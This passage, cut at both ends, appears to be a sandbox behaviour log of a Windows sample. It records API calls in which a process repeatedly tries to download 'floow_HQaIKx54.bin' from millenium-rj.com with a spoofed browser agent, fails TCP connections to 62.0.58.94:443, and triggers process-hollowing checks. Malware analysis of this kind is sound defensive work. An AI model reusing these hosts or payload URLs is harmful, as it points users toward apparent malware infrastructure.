"FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1040 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a4" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x000\\xadt\\x00" } ], "repeated": 0, "id": 1041 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1188" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1042 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a4" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca\\x17\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1043 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1188" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1044 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a4" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1045 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a4" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1046 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1188" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1047 }, { "timestamp": "2025-02-27 23:34:39,159", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1188" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1048 }, { "timestamp": "2025-02-27 23:34:43,191", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1188" } ], "repeated": 0, "id": 1049 }, { "timestamp": "2025-02-27 23:34:43,237", "thread_id": "11160", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 21, "id": 1050 }, { "timestamp": "2025-02-27 23:34:43,237", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0010" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1051 }, { "timestamp": "2025-02-27 23:34:43,237", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1052 }, { "timestamp": "2025-02-27 23:34:43,237", "thread_id": "11160", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1053 }, { "timestamp": "2025-02-27 23:34:44,284", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0014", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1054 }, { "timestamp": "2025-02-27 23:34:44,284", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1055 }, { "timestamp": "2025-02-27 23:34:44,284", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0014" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1056 }, { "timestamp": "2025-02-27 23:34:44,316", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1057 }, { "timestamp": "2025-02-27 23:34:44,316", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x0000048c", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1164" } ], "repeated": 0, "id": 1058 }, { "timestamp": "2025-02-27 23:34:44,316", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1059 }, { "timestamp": "2025-02-27 23:34:44,316", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\xb0\\xc0s\\x00" } ], "repeated": 0, "id": 1060 }, { "timestamp": "2025-02-27 23:34:44,316", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1061 }, { "timestamp": "2025-02-27 23:34:44,316", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca\\x1c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1062 }, { "timestamp": "2025-02-27 23:34:44,316", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1063 }, { "timestamp": "2025-02-27 23:34:44,316", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1064 }, { "timestamp": "2025-02-27 23:34:44,316", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1065 }, { "timestamp": "2025-02-27 23:34:44,316", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1066 }, { "timestamp": "2025-02-27 23:34:44,316", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1067 }, { "timestamp": "2025-02-27 23:34:48,425", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" } ], "repeated": 0, "id": 1068 }, { "timestamp": "2025-02-27 23:34:48,425", "thread_id": "11036", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1069 }, { "timestamp": "2025-02-27 23:34:48,425", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0014" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1070 }, { "timestamp": "2025-02-27 23:34:48,425", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1071 }, { "timestamp": "2025-02-27 23:34:48,425", "thread_id": "11036", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1072 }, { "timestamp": "2025-02-27 23:34:49,456", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0018", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1073 }, { "timestamp": "2025-02-27 23:34:49,456", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1074 }, { "timestamp": "2025-02-27 23:34:49,456", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0018" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1075 }, { "timestamp": "2025-02-27 23:34:49,503", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1076 }, { "timestamp": "2025-02-27 23:34:49,503", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x0000048c", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1164" } ], "repeated": 0, "id": 1077 }, { "timestamp": "2025-02-27 23:34:49,503", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1078 }, { "timestamp": "2025-02-27 23:34:49,503", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\xa8\\xcfu\\x00" } ], "repeated": 0, "id": 1079 }, { "timestamp": "2025-02-27 23:34:49,503", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1080 }, { "timestamp": "2025-02-27 23:34:49,503", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1081 }, { "timestamp": "2025-02-27 23:34:49,503", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1082 }, { "timestamp": "2025-02-27 23:34:49,503", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1083 }, { "timestamp": "2025-02-27 23:34:49,503", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1084 }, { "timestamp": "2025-02-27 23:34:49,503", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1085 }, { "timestamp": "2025-02-27 23:34:49,503", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1086 }, { "timestamp": "2025-02-27 23:34:51,612", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1087 }, { "timestamp": "2025-02-27 23:34:51,612", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" } ], "repeated": 0, "id": 1088 }, { "timestamp": "2025-02-27 23:34:51,612", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1089 }, { "timestamp": "2025-02-27 23:34:51,612", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0018" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1090 }, { "timestamp": "2025-02-27 23:34:51,612", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1091 }, { "timestamp": "2025-02-27 23:34:51,956", "thread_id": "388", "caller": "0x764fdce4", "parentcaller": "0x76f68bc0", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000003a8" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 1092 }, { "timestamp": "2025-02-27 23:34:52,659", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1093 }, { "timestamp": "2025-02-27 23:34:52,659", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc001c", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1094 }, { "timestamp": "2025-02-27 23:34:52,659", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1095 }, { "timestamp": "2025-02-27 23:34:52,659", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc001c" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1096 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1097 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004ac" } ], "repeated": 0, "id": 1098 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004a0" } ], "repeated": 0, "id": 1099 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1100 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 1101 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000498" } ], "repeated": 0, "id": 1102 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" } ], "repeated": 0, "id": 1103 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000494" } ], "repeated": 0, "id": 1104 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1105 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000494", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1172" } ], "repeated": 0, "id": 1106 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000494" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1107 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000494" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x000\\xadt\\x00" } ], "repeated": 0, "id": 1108 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1172" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1109 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000494" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1110 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1172" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1111 }, { "timestamp": "2025-02-27 23:34:52,737", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000494" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": 